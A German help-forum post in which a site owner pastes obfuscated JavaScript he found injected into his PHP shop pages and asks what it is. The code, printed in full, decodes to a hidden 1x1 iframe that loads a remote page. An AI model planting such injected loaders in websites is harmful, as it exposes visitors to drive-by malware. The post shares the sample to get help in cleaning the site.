ich habe in php ein kleines Projekt zusammen kopiert und auch darin eine superclix Shoplösung eingebunden. Nichts wildes ein wenig php, etwas html und fertig. Neulich bekomme ich von den Besuchern Infos das die Seite beim Aufruf eine Virenwarnung hervorruft. Ich hab mir die Seiten angesehen und auf der index.php und der index2.php folgenden Code gefunden, der nicht von mir stammt.
Code: Alles auswählen
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
Ich hab das noch nie gesehen und mich würde mal interesieren was das ist, wo es herkommt und was ich dagegen machen kann. Ich hab nun die Dateien von chmod 644 auf 444 geändert...
Gruß
Stp
